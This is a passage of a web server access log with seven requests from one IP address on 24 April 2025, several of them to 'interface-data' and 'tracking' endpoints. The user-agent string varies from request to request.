[24/Apr/2025:12:16:07 -0400] "GET /interface-data/books-init HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 154.84.62.234 - - [24/Apr/2025:12:16:09 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.79" 154.84.62.234 - - [24/Apr/2025:12:16:10 -0400] "GET /interface-data/books-init HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:12:16:49 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_5_7; es) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.7 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:12:16:57 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:17:26 -0400] "POST /tracking/client_1/get-resource HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.25" 154.84.62.234 - - [24/Apr/2025:12:17:27 -0400] "POST /tracking/client_1/read-instruction HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/617.16.12 (KHTML, like Gecko) Version/17.7.92 Safari/617.16.12"